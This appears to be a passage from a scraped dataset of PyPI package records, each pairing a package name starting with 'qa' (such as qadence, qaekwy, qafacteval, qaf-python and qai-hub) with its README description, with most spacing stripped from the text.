ourissue tracker.Developing in qadence:To learn more about how to develop withinqadence, please refer tocontributing guidelines.Setting up qadence in development modeWe recommend to use thehatchenvironment manager to installqadencefrom source:python-mpipinstallhatch# get into a shell with all the dependenciespython-mhatchshell# run a command within the virtual environment with all the dependenciespython-mhatchrunpythonmy_script.pyWARNINGhatchwill not combine nicely with other environment managers such as Conda. If you still want to use Conda,\ninstall it from source usingpip:# within the Conda environmentpython-mpipinstall-e.CitationIf you use Qadence for a publication, we kindly ask you to cite our work using the following BibTex entry:@article{qadence2024pasqal,\n title ={Qadence: a differentiable interface for digital-analog programs.},\n author={Dominik Seitz and Niklas Heim and Jo\u00e3o P. Moutinho and Roland Guichard and Vytautas Abramavicius and Aleksander Wennersteen and Gert-Jan Both and Anton Quelle and Caroline de Groot and Gergana V. Velikova and Vincent E. Elfving and Mario Dagrada},\n journal={arXiv:2401.09915},\n url ={https://github.com/pasqal-io/qadence},\n year ={2024}}LicenseQadence is a free and open source software package, released under the Apache License, Version 2.0."} +{"package": "qadence-libs", "pacakge-description": "Qadence-LibsQadence-Libsis a Python package that provides extra functionality for Qadence.Installation guidePyPIand can be installed usingpipas follows:pipinstallqadence_libsContributingBefore making a contribution, please review ourcode of conduct.Submitting Issues:To submit bug reports or feature requests, please use ourissue tracker.Developing in qadence:To learn more about how to develop withinqadence, please refer tocontributing guidelines.Setting up qadence in development modeWe recommend to use thehatchenvironment manager to installqadence_libsfrom source:python-mpipinstallhatch# get into a shell with all the dependenciespython-mhatchshell# run a command within the virtual environment with all the dependenciespython-mhatchrunpythonmy_script.pyWARNINGhatchwill not combine nicely with other environment managers such as Conda. If you still want to use Conda,\ninstall it from source usingpip:# within the Conda environmentpython-mpipinstall-e.CitationIf you use Qadence-Libs for a publication, we kindly ask you to cite our work using the following BibTex entry:@misc{qadence-libs2024pasqal,\n url ={https://github.com/pasqal-io/qadence-libs},\n title ={Qadence Libs:{A}n{E}xperiment runner for Qadence.},\n year ={2023}}LicenseQadence-Libs is a free and open source software package, released under the Apache License, Version 2.0."} +{"package": "qadence-protocols", "pacakge-description": "Qadence-ProtocolsQadence-Protocolsis a Python package that provides extra functionality for Qadence.Installation guidePyPIand can be installed usingpipas follows:pipinstallqadence_protocolsContributingBefore making a contribution, please review ourcode of conduct.Submitting Issues:To submit bug reports or feature requests, please use ourissue tracker.Developing in qadence:To learn more about how to develop withinqadence, please refer tocontributing guidelines.Setting up qadence in development modeWe recommend to use thehatchenvironment manager to installqadence_protocolsfrom source:python-mpipinstallhatch# get into a shell with all the dependenciespython-mhatchshell# run a command within the virtual environment with all the dependenciespython-mhatchrunpythonmy_script.pyWARNINGhatchwill not combine nicely with other environment managers such as Conda. If you still want to use Conda,\ninstall it from source usingpip:# within the Conda environmentpython-mpipinstall-e.CitationIf you use Qadence-Protocols for a publication, we kindly ask you to cite our work using the following BibTex entry:@misc{qadence-protocols2024pasqal,\n url ={https://github.com/pasqal-io/qadence-protocols},\n title ={Qadence Protocols:{A}n{E}xperiment runner for Qadence.},\n year ={2023}}LicenseQadence-Protocols is a free and open source software package, released under the Apache License, Version 2.0."} +{"package": "q-a-dependencies", "pacakge-description": "UNKNOWN"} +{"package": "qadre", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qaekwy", "pacakge-description": "Qaekwy Python ClientOperational Research at your fingertips.The Qaekwy Python Client serves as a powerful tool to interact with the Qaekwy optimization\nsolver engine through its API. This client provides a convenient and programmatic way tocreate,model, andsolveoptimization problems using Qaekwy, streamlining\nthe process offormulating complex problems and finding optimal solutions.Qaekwy is small optimization problem solver engine designed to tackle a wide range of\nreal-world challenges. It provides powerful modeling capabilities and efficient solving\nalgorithms to find optimal solutions to complex problems.FeaturesModeling Made Easy:Define variables, constraints, and objective functions seamlessly.\nQaekwy'sModellerclass helps you create optimization models with clarity and precision.Diverse Constraint Support:Qaekwy supports various constraint types, from simple arithmetic\nto complex mathematical expressions. Create constraints that accurately represent real-world scenarios.Effortless Optimization:Qaekwy abstracts away the complexities of communication with\noptimization engine. Send requests and receive responses using intuitive methods.Flexibility: You can leverage the Qaekwy Python Client to tailor optimization problems to their specific\nneeds by utilizing Qaekwy's modelling capabilities. This includes handling various types of constraints,\nobjectives, and solver algorithms.InstallationpipinstallqaekwyDocumentationExplore theQaekwy Documentationfor in-depth guides, examples, and usage details.ExampleHow to use the Qaekwy Python Client to solve a very small optimization problem:fromqaekwy.engineimportDirectEnginefromqaekwy.model.constraint.relationalimportRelationalExpressionfromqaekwy.model.specificimportSpecificMaximumfromqaekwy.model.variable.integerimportIntegerVariablefromqaekwy.model.modellerimportModellerfromqaekwy.model.searcherimportSearcherType# Define the optimization problem using Qaekwy Python ClientclassSimpleOptimizationProblem(Modeller):def__init__(self):super().__init__()# Create a integer variablesx=IntegerVariable(var_name=\"x\",domain_low=0,domain_high=10)y=IntegerVariable(var_name=\"y\",domain_low=0,domain_high=10)z=IntegerVariable(var_name=\"z\",domain_low=0,domain_high=10)# Constraintsconstraint_1=RelationalExpression(y>2*x)constraint_2=RelationalExpression(x>=4)constraint_3=RelationalExpression(z==y-x)# Objective: Maximize zself.add_objective(SpecificMaximum(variable=z))# Add variable and constraint to the problemself.add_variable(x)self.add_variable(y)self.add_variable(z)self.add_constraint(constraint_1)self.add_constraint(constraint_2)self.add_constraint(constraint_3)# Set the search strategyself.set_searcher(SearcherType.BAB)# Create a Qaekwy engine for interaction with the freely-available Cloud instanceqaekwy_engine=DirectEngine()# Create the optimization problem instanceoptimization_problem=SimpleOptimizationProblem()# Request the Qaekwy engine to solve the problemresponse=qaekwy_engine.model(model=optimization_problem)# Retrieve the list of solutions from the responselist_of_solutions=response.get_solutions()# Print the solution(s) obtainedforsolutioninlist_of_solutions:print(f\"Optimal solution: x ={solution.x}\")print(f\"Optimal solution: y ={solution.y}\")print(f\"Optimal solution: z ={solution.z}\")Output:Optimal solution: x = 4\nOptimal solution: y = 10\nOptimal solution: z = 6LicenseThis software is licensed under theEuropean Union Public License v1.2"} +{"package": "qa-engine", "pacakge-description": "QA engineOMBot\u9879\u76ee\u7684QA\u5f15\u64ce\uff0c\u63d0\u4f9b\u9879\u76ee\u95ee\u7b54\u529f\u80fd\u4f7f\u7528\u65b9\u6cd51. \u89e6\u53d1\u95f2\u804a\u6a21\u5f0ffromqa_engineimportQAEnginefromombot_utils.schemasimportChatRecordsif__name__=='__main__':qa=QAEngine()records={\"bot_id\":\"2\",\"session_id\":\"string\",\"callback\":\"string\",\"messages\":[{\"role\":\"user\",\"message_type\":\"image\",\"src_type\":\"url\",\"content\":\"https://minio/hzlh/omintel/cess/c25f30559b974c728e5dbe1d4177aa5a.jpg\",\"objects\":[]},{\"role\":\"user\",\"message_type\":\"text\",\"src_type\":\"text\",\"content\":\"\u4f60\u597d\uff0c\u8bf7\u95ee\u4f60\u662f\u8c01\uff1f\",\"objects\":[]}]}records=ChatRecords(**records)qa.run(bot_id=\"2\",chat_records=records)1. \u89e6\u53d1\u4e13\u4e1a\u6a21\u5f0ffromqa_engineimportQAEnginefromombot_utils.schemasimportChatRecordsif__name__=='__main__':qa=QAEngine()records={\"bot_id\":\"2\",\"session_id\":\"string\",\"callback\":\"string\",\"messages\":[{\"role\":\"user\",\"message_type\":\"image\",\"src_type\":\"url\",\"content\":\"https://minio/hzlh/omintel/cess/c25f30559b974c728e5dbe1d4177aa5a.jpg\",\"objects\":[]},{\"role\":\"user\",\"message_type\":\"text\",\"src_type\":\"text\",\"content\":\"\u89c6\u9891\u4e2d\u6709\u4eba\u6454\u5012\u5417\uff1f\",\"objects\":[]}]}records=ChatRecords(**records)qa.run(bot_id=\"2\",chat_records=records)"} +{"package": "qa-e-nsi", "pacakge-description": "Assurance qualit\u00e9 sur les productions e-nsiComme nous sommes tr\u00e8s assur\u00e9s \u00e0 la qualit\u00e9 des exercices produits par le group de travaile-nsi, nous avons souhait\u00e9 d\u00e9velopper un outil pour automatiser un certain nombre de v\u00e9rification."} +{"package": "qaenv", "pacakge-description": "QA Environment"} +{"package": "qaes", "pacakge-description": "No description available on PyPI."} +{"package": "qaeval", "pacakge-description": "No description available on PyPI."} +{"package": "qafacteval", "pacakge-description": "QAFactEval: Improved QA-Based Factual Consistency Evaluation for SummarizationThis is the official code repository for the NAACL 2022 paperQAFactEval: Improved QA-Based Factual Consistency Evaluation for SummarizationbyAlexander R. Fabbri,Chien-Sheng Wu,Wenhao Liu, andCaiming Xiong.In our paper, we conduct an extensive comparison of the components of QA-based metrics for factual consistency evaluation in summarization. Our optimized metric builds onQAEvalwith question consistency filtering and an improved answer overlap metric, leading to a 14% average improvement over previous QA-based metrics on theSummaCfactual consistency benchmark.Table of ContentsUpdatesUsing QAFactEvalCitationLicenseUpdates5/2/2022- Initial commit! :)Using QAFactEvalYou can install qafacteval via pip:pipinstallqafactevalYou can also install from source:gitclonehttps://github.com/salesforce/QAFactEvalcdQAFactEval\npipinstall-e.For use in scriptsDownload the required pretrained models usingdownload_models.sh.Seerun.pyfor an example of using the QAFactEval metric:fromqafactevalimportQAFactEvalkwargs={\"cuda_device\":0,\"use_lerc_quip\":True,\\\"verbose\":True,\"generation_batch_size\":32,\\\"answering_batch_size\":32,\"lerc_batch_size\":8}model_folder=\"\"# path to models downloaded with download_models.shmetric=QAFactEval(lerc_quip_path=f\"{model_folder}/quip-512-mocha\",generation_model_path=f\"{model_folder}/generation/model.tar.gz\",answering_model_dir=f\"{model_folder}/answering\",lerc_model_path=f\"{model_folder}/lerc/model.tar.gz\",lerc_pretrained_model_path=f\"{model_folder}/lerc/pretraining.tar.gz\",**kwargs)results=metric.score_batch([\"This is a source document\"],[[\"This is a summary.\"]],return_qa_pairs=True)score=results[0][0]['qa-eval']['lerc_quip']CitationWhen referencing this repository, please citethis paper:@misc{fabbri-etal-2022-qafacteval,title={QAFactEval: Improved QA-Based Factual Consistency Evaluation for Summarization},author={Alexander R. Fabbri and Chien-Sheng Wu and Wenhao Liu and Caiming Xiong},year={2022},eprint={2112.08542},archivePrefix={arXiv},primaryClass={cs.CL},url={https://arxiv.org/abs/2112.08542},}LicenseThis repository is released under theBSD-3 License."} +{"package": "qaffeine", "pacakge-description": "qaffeineLittle tool that prevents your computer from entering inactivity modes. Can run in a terminal or in the notification area. Written in Python 3 and Qt 5.Compatible with Linux, OS/X and Windows.RequirementsPython 3PySide2pyautoguiInstallationUsing PIP#pip3 install qaffeineThis will pull the dependencies automatically.Using the setup.py supplied in the source tree#python3 setup.py installUsageCommand lineSyntax:$ qaffeine-cli -h\nusage: Prevent computer inactivity by simulating key presses\n [-h] [-n] [-d DELAY] [-k KEY] [-v]\n\noptional arguments:\n -h, --help show this help message and exit\n -n, --nogui Don't start a GUI, only a operate in text mode\n -d DELAY, --delay DELAY\n Delay between key presses in seconds [default: 5] -\n only valid with --nogui\n -k KEY, --key KEY Key to press [default: altright]; see keys.txt for a\n list of valid values - only valid with --nogui\n -v, --version Show version number and exitGUIRunning qaffeine without any argument starts the graphical interface. Qaffeine then runs in the notification area."} +{"package": "qaf-python", "pacakge-description": "QAF-Python Automation FrameworkThe QAF-Python Automation Framework is designed to facilitate functional test automation for various platforms,\nincluding Web, Mobile Web, Mobile Hybrid apps, Mobile Native apps, and web services. It offers a comprehensive set of\nfeatures for driver and resource management, data-driven testing, and BDD support using QAF BDD2. The framework is built\non Python 3.x and seamlessly integrates with popular tools like pytest, WebDriver, and Appium.Installationpip install git+https://github.com/qmetry/qaf-python.git@masterRun Testpytest []Quick ExampleSteps file:proj/steps/commonsteps.pyfromqaf.automation.bdd2import*fromqaf.automation.step_def.common_stepsimport*@step(\"user is on application home\")defopen_app():get(\"/\")@step(\"login with{username}and{password}\")deflogin(username,password):sendKeys(\"username.txt.ele\",username)sendKeys(\"password.txt.ele\",password)click(\"login.btn.ele\")You have the flexibility to write your tests usingeitherPython as pytestorin a behavior-driven development (\nBDD)\nstyle. This allows you to choose the approach that best suits your preferences and project requirements.Testcase authoring in BDDBDD file:features/login.feature@web@mobile@storyKey:PRJ001@module:loginFeature:Login functionality@smoke@testCaseId:TC001Scenario:user should be able to login into applicationGivenuser is on application homeWhenlogin with '${valid.user.name}' and '${valid user.password}'Thenverify 'logout.btn.ele' is present@datafile:resources/${env.name}/logindata.csvScenario:user should be able to login into applicationGivenuser is on application homeWhenlogin with '${user-name}' and '${password}'Thenverify 'error.text.ele' text is '${error-msg}'Run testsYou can run BDD same as running normal pytestpytestfeatures# all files from features directorypytestfeatures/login.feature# single filepytestfeatures--dryrun# dry-run modeyou can use pytest mark or qaf metadata filter.pytestfeatures-mweb--metadata-filter\"module == 'login' and storyKey in ['PRJ001', 'PRJ005']\"Test case authoring in python script (pytest)fromqaf.automation.step_def.common_stepsimportverify_present,verify_textfromproj.steps.commonstepsimport*@pytest.mark.web@pytest.mark.mobile@metadata(storyKey=\"TC001\",module=\"login\")classloginFunctionality:@metadata(\"smoke\",testCaseId=\"TC001\")deftest_login():open_app()login(getBundle().get_string('valid.user.name'),getBundle().get_string('valid.user.password'))verify_present(None,'logout.btn.ele')@dataprovider(datafile=\"resources/${env.name}/logindata.csv\")deftest_login(testdata):open_app()login(testdata.get('user-name'),testdata.get('password'))verify_text(None,'error.text.ele',testdata.get('error-msg'))run testsame as running normal pytest with additional meta-data filter as shown in example aboveFeaturesHere is list of features in addition to features supported by pytestWeb, Mobile, and Web Services Testing: The framework supports test automation for Web applications, Mobile Web,\nMobile Hybrid apps, Mobile Native apps, and web services. It provides a unified solution for testing different\nplatforms.Configuration Management: The framework offers robust configuration management capabilities. It supports various\nconfiguration file formats such asini,properties,wsc,loc,locj, andwscj. This allows you to manage and organize\nyour test configuration efficiently.Driver Management: The framework simplifies the management of WebDriver and Appium drivers. It supports on-demand\ndriver session creation and automatic teardown, making it easy to without worring of set up and clean up driver\nsessions. You can configure the driver properties through properties files, enabling flexibility in driver\nconfiguration.Driver and Element Command Listeners: The framework allows you to register driver command listeners and element\ncommand listeners. This feature enables you to intercept and modify driver and element commands, facilitating custom\nbehavior and extensions.Support for Multiple Driver Sessions: QAF-Python supports multiple driver sessions in the same test. This means\nyou can test scenarios that involve multiple browser instances or multiple mobile devices simultaneously.Wait/Assert/Verify Functionality: The framework provides convenient methods for waiting, asserting, and verifying\nelement states. It includes automatic waiting capabilities, ensuring synchronization between test steps and\napplication behavior.Locator Repository: QAF-Python includes a locator repository for managing web and mobile element locators. The\nrepository allows you to store and organize element locators, making them easily accessible and reusable across tests.Request Call Repository: For testing web services, the framework provides a repository for managing web service\nrequest calls. You can store and manage your API requests, making it convenient to handle different API scenarios and\npayloads.Data-Driven Testing: QAF-Python supports data-driven testing by integrating with CSV and JSON data files. You can\nparameterize your tests and iterate over test data, enabling you to run tests with different input values and expected\nresults.Native Pytest Implementation of QAF-BDD2: The framework offers a native implementation of QAF-BDD2 in pytest. This\nallows you to write BDD-style tests using the Given-When-Then syntax and organize them into feature files. You can use\nmetadata annotations and tags to categorize and filter tests based on criteria such as story key, module, and more.Step Listener with Retry Step Capability: QAF-Python includes a step listener that provides retry capabilities for\ntest steps. If a step fails, the framework can automatically retry the step for a specified number of times, enhancing\nthe robustness of your tests.Dry Run Support: You can perform a dry run of your tests using the framework. This allows you to check the test\nexecution flow, identify any errors or issues, and ensure that the tests are set up correctly before running them for\nreal.Metadata Support with Metadata Filter: QAF-Python supports metadata annotations and filters. You can assign\nmetadata to tests, such as story key, module, or custom tags, and use metadata filters to selectively run tests based\non specific criteria.Detailed Reporting: The framework provides detailed reporting capabilities, giving you insights into test\nexecution results. You can generate comprehensive reports that include test status, step-level details, screenshots,\nand other relevant information.Repository Editor: QAF offers a repository editor tool that allows you to create and update the locator\nrepository and request call repository easily. The editor provides a user-friendly interface for managing and\norganizing your locators and API requests. You can\nuserepository editorto create/update locator\nrepository and request call repository.Driver Management benefitsThe framework simplifies the management of WebDriver and Appium drivers. It supports on-demand driver session creation\nand automatic teardown, making it easy to set up and clean up driver sessions. This feature allows you to focus on\nwriting test scripts rather than dealing with driver setup and cleanup processes.On-Demand Driver Session Creation: With the framework's on-demand driver session creation, framework dynamically\ncreates driver instances whenever you need them during test execution. This ensures that the drivers are available\nprecisely when required, reducing resource wastage and enhancing test execution efficiency.Automatic Teardown: After test execution or when a test session ends, the framework automatically tears down the\ndriver sessions. This cleanup process prevents any potential resource leaks and optimizes the utilization of testing\nresources.Driver Configuration via Properties Files: The framework allows you to configure driver through properties files.\nThis approach provides a convenient and organized way to manage various driver settings, such as browser preferences,\ntimeouts, and capabilities, in separate configuration files. It makes the driver configuration process more manageable\nand less error-prone.Flexibility in Driver Configuration: By using properties files for driver configuration, you gain flexibility in\ncustomizing the driver behavior. You can easily update the properties files to modify driver settings without\nmodifying the test scripts, which enhances maintainability and reusability of your automation code.The Driver Management feature in the framework streamlines the process of working with WebDriver and Appium drivers. It\nensures that driver sessions are readily available when needed and automatically handles cleanup after test execution.\nAdditionally, the flexibility in driver configuration through properties files simplifies the management of driver\nsettings, improving the overall efficiency and organization of your test automation process.Properties used by frameworkKeyUsageselenium.wait.timeoutDefault wait time to be used by framework by wait/assert/verify methodsremote.serverRemote server url, which will be considered if configured remote driver. e.g.http://localhost:, localhost, 127.0.0.1, etc..remote.portRemote server port, which will be considered if configured remote driverdriver.nameDriver to be used, for instance firefoxDriver or firefoxRemoteDriver etc..driver.capabilitiesSpecify additional capability by name with this prefix that can applicable for any driver.driver.additional.capabilitiesSpecify multiple additional capabilities as map that can applicable for any driver{0}.additional.capabilitiesSpecify multiple additional capabilities as map that can applicable for specific driver. For example, chrome.additional.capabilities.{0}.capabilitiesSpecify additional capability by name with this prefix that can applicable for specific driver. For example, chrome.capabilities.env.baseurlBase URL of AUT to be used.env.resourcesFile or directory to load driver specific resources, for instance driver specific locators.wd.command.listenersList of web driver command listeners (fully qualified class name that abstract qaf.automation.ui.webdriver.abstract_listener.DriverListener) to be registered.we.command.listenersList of web element command listeners (fully qualified class name that abstract qaf.automation.ui.webdriver.abstract_listener.ElementListener) to be registered.ws.command.listenersList of web service command listeners (fully qualified class name that abstract qaf.automation.ws.rest.ws_listener.WsListener) to be registered.env.default.localeLocal name from loaded locals that need to treated as default localtesting.approache.g. behave, pytestLicenseThis project is licensed under the MIT License.AcknowledgementsWe would like to thank the pytest community for their excellent work in developing a robust and extensible testing\nframework. Their contributions have been invaluable in building this enhanced test automation framework."} +{"package": "qafs", "pacakge-description": "Quality Aware Feature StoreSimple and scalable feature store with data quality checks.feature store aim to solve the data management problems when building Machine Learning applications. However the data quality is a component which data teams need integrate and handle as separated component. This project join both concepts keeping the data quality closely coupled with data transformations making necessary a minimal data verification check and possibiliting the data/transformations check evolve during the projects.For thatqafshave a strong dependecy withpanderato build the data validations.FeaturesPandas-like APIFeatures information stored in database along with metadata.Dask to process large datasets in a cluster enviroment.Data is stored as timeseries inParquet format, store in filesystem or object storage services.Store transformations as feature.Get StartedInstalling the python package through pip:$pipinstallqafsBellow is an example of usageqafswhere we'll create a feature store and registernumbersfeature and ansquaredfeature transformation. First we need import the packages and create the feature store, for this example we are using sqlite database and persisting the features in the filesystem:importqafsimportpandasaspdimportpanderaaspafrompanderaimportCheck,Column,DataFrameSchemafrompanderaimportiofs=qafs.FeatureStore(connection_string='sqlite:///test.sqlite',url='/tmp/featurestore/example')Features could be stored in namespaces, it help organize the data. When creatingnumberswe specify the'example/numbers'feature to point the featurenumbersat that namespaceexamplehowever we can use the argumentsname='numbers', namespace='example'as well. The we specify the data validation usingpanderatelling that feature isIntegerand the values should begreater than 0:fs.create_namespace('example',description='Example datasets')fs.create_feature('example/numbers',description='Timeseries of numbers',check=Column(pa.Int,Check.greater_than(0)))dts=pd.date_range('2020-01-01','2021-02-09')df=pd.DataFrame({'time':dts,'numbers':list(range(1,len(dts)+1))})fs.save_dataframe(df,name='numbers',namespace='example')To register oursquaredtransformation feature we're using the annotationfs.transformand fetching the data from thenumbersfeature applying the same data validation fromnumbers:@fs.transform('example/squared',from_features=['example/numbers'],check=Column(pa.Int,Check.greater_than(0)))defsquared(df):returndf**2When fetch our features we should see:df_query=fs.load_dataframe(['example/numbers','example/squared'],from_date='2021-01-01',to_date='2021-01-31')print(df_query.tail(1))##----# example/numbers example/squared# time# 2021-01-31 397 157609##----ContributingPlease follow theContributingguide.LicenseGPL-3.0 LicenseThis project started using the as basebytehub feature storeand is under the same license."} +{"package": "qafunnypet", "pacakge-description": "qafunnypetInstall qafunnypet from PyPi.pipinstallqafunnypetExamplefromqafunnypetimportQafunnypetclassDog(Qafunnypet):def__init__(self,name,age,color=None):super().__init__(name,age)self.color=colordefpresent(self):ifself.colorisNone:passelse:print(f\"I am{self.name}and I am{self.age}years old and I am{self.color}\")defspeak(self):print(\"Bark\")>>>doggy=Dog(\"Tim\",15,\"Bronw\")>>>doggy.present()>>>doggy.speak()>>>some=Qafunnypet(\"Cuasi\",10)>>>some.present()>>>some.speak()"} +{"package": "qaga", "pacakge-description": "No description available on PyPI."} +{"package": "qa-genie", "pacakge-description": "QA GenieEnglish |\u0939\u093f\u0902\u0926\u0940QA Genie is a Python package designed for generating questions and answers from unstructured data.This package is built using the unofficial API of HuggingChat:hugchat. It leverages HuggingChat's capabilities for question and answer generation.NoteThis package is in its alpha release and more functionality will be added soon!Update 1.0.0a3:This update enables the user to adjust iteration time. (Solves #1)Update 1.0.0a4:Enables user to get raw text output from chatbot for manual cleaning. Also fixes bugs in cleaning.Installationpipinstallqa_genieorpip3installqa_genieUsageemail=\"your_email@example.com\"# huggingface account emailpassword=\"your_password\"# huggingface account passwordmodel=\"meta\"# use \"meta\" to use meta-llama/Llama-2-70b-chat-hf or \"oasst\" to use OpenAssistant/oasst-sft-6-llama-30b# Initialize chatbotchatbot=get_generator(email,password,model)# Example usage with a single texttext=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\"result_single=extract_qa(chatbot,text,num_qn=3)# returns pandas.DataFrame with num_qn questions and answers# Example usage with multiple textstexts=[\"Text 1\",\"Text 2\",\"Text 3\"]result_multiple=extract_qas(chatbot,texts,num_qn_each=3)# return pandas.DataFrame with num_qn_each questions and answers generated for each textImportant NoteAs mentioned bySoulter, Server resources are precious, it is not recommended to request this API in a high frequency.ContributingFeel free to contribute to QA Genie by creating issues, submitting pull requests, or suggesting improvements. Your contributions are highly appreciated :)"} +{"package": "qahal", "pacakge-description": "Date:2022-01-24Version:1.0.0Authors:Mohammad Alghafli State machine with variables within states.This library was made to make it easier to make a menu and keep track of where\nthe user is within the menu."} +{"package": "qa-helper", "pacakge-description": "dokr - Make your docker and ecs tasks easyA Helper pip package for docker and ECS tasks. This pip package helps you automate your CI/CD pipeline. If your using docker and Amazon ECS for deployments, this tool can be really helpful. This package uses aws cli and ecs cli. MakAssumptions:Assuming python is installed on your system.Docker is installed on your systemaws-cliis installed and credentials are configured on your system.ecs-cliis installed on system [For Log Command only]Installdokron your system using :pip install dokrECS Optionslogin into ecs directly (Assuming awscli is installed and configured)dokr ecs loginDeploy an image on a clusterdokr ecs deploy --cluster cluster_name --service service_name --tag image_versionCheck ecs running logs of a Task - this command will ask for cluster/service and task defination.Note:Install ecs-cli before running this command from here:https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_CLI_installation.htmldokr ecs logDocker Helper CommandsPrune whole system - Cleans unused images, containers and volumes.dokr dock --clean-allDelete all the images matching the patterndokr dock --clean pattern_xxxAdd a tag to the existing image matching the provided pattern (for latest tag only)dokr dock --tag pattern_xxx tag_namePush all images on a system matching a patternThis will push all images matching pattern 'pat'dokr dock --push patAWS CommandsCheck current public ip of a machine on AWSdokr aws --ip jenkinsRun Apps (subsitute todocker runcommand and DockerCompose)Configure your default values(like docker registry, port mapping, volume mapping etc. that will be same for all apps):Add an new app for deployment:Run all configured apps:Run a particular app from ECR tags:Run a particular app by providing a tag:Development:Clean ununsed:rm -rf build/ dist/ *egg* **.pyc __pycache__Build package:python setup.py bdist_wheeldeploy package:python -m twine upload dist/*follow this link for more detailshttps://dzone.com/articles/executable-package-pip-install"} +{"package": "qai", "pacakge-description": "library.qai.utilitiesHelper functions and classes for interacting with the rest of the Writer platform. The main components are:qai.issues.make_issue: makes a dictionary that conforms to Writer platform standardsqai.spacy_factor.SpacyFactor: a helper class which turns a spaCy Span into an issueqai.server.QRest: a helper class which builds a Sanic REST server for youqai.validation.Validator: a simple validator class that can be used to skip segments without processing them, e.g. for being empty or having HTML. You would only want to import this yourself if you aren't usingQRestIf you are building a Sanic app without usingQRest, you still may be interested in the following middleware:qai.server.set_valid_segments: stores valid segments torequest.ctx.segmentsand also setsrequest.ctx.infoqai.server.postprocess_issues: changes the string indexing to be utf-16 based, and filters no ops(See GitHub history for older docs - QAI used to do a lot more!)Upgrading to v5Analyzerclass must now be callable. It will be passed(segment: str, meta: dict, all_info: dict)-segmentis the string to analyze,metais themetaobject that was sent, or{}if none was sent, andall_infois the entire payload the server received - in case you need access to clientID or something. Feel free to definedef __call__(self, segment: str, meta: dict, _)if you don't expect to need the request.QRestcan be passed a Sanic app, or be passed a dictionary which maps issue types to categories (in addition to the default behavior). This is useful for services that handle multiple categories, for which the default behavior doesn't work.QAI has a simpler structure, so all imports look differentConfigs, Strings, Storage, and Document are gone. The later 2 because they aren't needed anymore, the former 2 because you should manage that yourself. Whitelisting is also gone - just don't make the issues if you don't want them.All issues are created in the v2 format (meaning, the format we switched to after new segmentation - definedhere)By default, issuefromanduntilkeys are now based on UTF-16 indexing, to make things easier for JS. We add_from_pand_until_pkeys for debugging, which are the Python string indexes. This happens as response middleware in QRest.UsageYou can explicitly create a REST connection like this:fromappimportAnalyzerfromqai.serverimportQRest# setting the category / service name does nothing# we use the category passed on the requestcategory='service_name'host='0.0.0.0'port=5000if__name__=='__main__':analyzer=Analyzer()rest_connection=QRest(analyzer,category=category,host=host,port=port)# create a blocking connection:rest_connection.connect()The above will createas many workers as you have cores.This is great, sometimes. For example, there is a known bug where AutoML crashes if you are using more than one worker. So passworkers=1if this happensThere is also a helper class for turning spaCySpans into issues the rest of the platform can process:fromspacy.tokensimportSpanfromqai.spacy_factorimportSpacyFactorMyFactor=SpacyFactor(\"subject_object_verb_spacing\",\"Keep the subject, verb, and object of a sentence close together to help the reader understand the sentence.\")Span.set_extension(\"score\",default=0)Span.set_extension(\"suggestions\",default=[])doc=nlp(\"Holders of the Class A and Class B-1 certificates will be entitled to receive on each Payment Date, to the extent monies are available therefor (but not more than the Class A Certificate Balance or Class B-1 Certificate Balance then outstanding), a distribution.\")score=analyze(doc)ifscoreisnotNone:span=Span(doc,0,len(doc))# or whichever tokens/spans are the issue (don't have to worry about character indexes)span._.score=scorespan._.suggestions=get_suggestions(doc)issue=MyFactor(span)Installationpip install qaiorpoetry add qaiTestingSee Confluence for docs on input format expectations.scripts/test_qai.shhas some helpful testing functions.CI/CDGitHub Actions will push to PyPi when you merge into themainbranch.LicenseThis software is not licensed. If you do not work at Writer, you are not legally allowed to use it. Also, it's just helper functions that really won't help you. If something in it does look interesting, and you would like access or our help, open an issue."} +{"package": "qai-core", "pacakge-description": "Core library and modules for QRevMetadata"} +{"package": "qai-hub", "pacakge-description": "Qualcomm\u00ae AI Hubsimplifies deploying AI models\nfor vision, audio, and speech applications to edge devices.helps to optimize, validate,\nand deploy machine learning models on-device for vision, audio, and speech use\ncases.With Qualcomm\u00ae AI Model Hub, you can:Convert trained models from frameworks like PyTorch for optimized on-device performance on Qualcomm\u00ae devices.Profile models on-device to obtain detailed metrics including runtime, load time, and compute unit utilization.Verify numerical correctness by performing on-device inference.Easily deploy models using Qualcomm\u00ae AI Engine Direct or TensorFlow Lite.qai_hubis a python package that provides an API for users to upload a\nmodel, submit the profile jobs for hardware and get key metrics to optimize the\nmachine learning model further.Installation with PyPIThe easiest way to installqai_hubis by using pip, runningpip install qai-hubFor more information, check out thedocumentation.LicenseCopyright (c) 2023, Qualcomm Technologies Inc. All rights reserved."} +{"package": "qai-hub-models", "pacakge-description": "Qualcomm\u00ae AI Hub ModelsTheQualcomm\u00ae AI Hub Modelsare a collection of\nstate-of-the-art machine learning models optimized for performance (latency,\nmemory etc.) and ready to deploy on Qualcomm\u00ae devices.Explore models optimized for on-device deployment of vision, speech, text, and genenrative AI.View open-source recipes to quantize, optimize, and deploy these models on-device.Browse throughperformance metricscaptured for these models on several devices.Access the models throughHugging Face.Sign upto run these models on hosted Qualcomm\u00ae devices.Supported runtimesTensorFlow LiteQualcomm AI Engine DirectSupported operating systems:Android 11+Supported compute unitsCPU, GPU, NPU (includesHexagon DSP,HTP)Supported precisionFloating Points: FP16Integer: INT8 (8-bit weight and activation on select models), INT4 (4-bit weight, 16-bit activation on select models)Supported chipsetsSnapdragon 845,Snapdragon 855/855+,Snapdragon 865/865+,Snapdragon 888/888+Snapdragon 8 Gen 1,Snapdragon 8 Gen 2,Snapdragon 8 Gen 3Select supported devicesSamsung Galaxy S21 Series, Galaxy S22 Series, Galaxy S23 Series, Galaxy S24 SeriesXiaomi 12, 13Google Pixel 3, 4, 5and many more.InstallationWe currently supportPython >=3.8 and <= 3.10.We recommend using a Python\nvirtual environment\n(minicondaorvirtualenv).You can setup a virtualenv using:python -m venv qai_hub_models_env && source qai_hub_models_env/bin/activateOnce the environment is setup, you can install the base package using:pipinstallqai_hub_modelsSome models (e.g.YOLOv7) require\nadditional dependencies. You can install those dependencies automatically\nusing:pipinstall\"qai_hub_models[yolov7]\"Getting StartedEach model comes with the following set of CLI demos:Locally runnable PyTorch based CLI demo to validate the model off device.On-device CLI demo that produces a model ready for on-device deployment and runs the model on a hosted Qualcomm\u00ae device (needssign up).All the models produced by these demos are freely available onHugging\nFaceor through ourwebsite. See the individual model readme\nfiles (e.g.YOLOv7) for more\ndetails.Local CLI 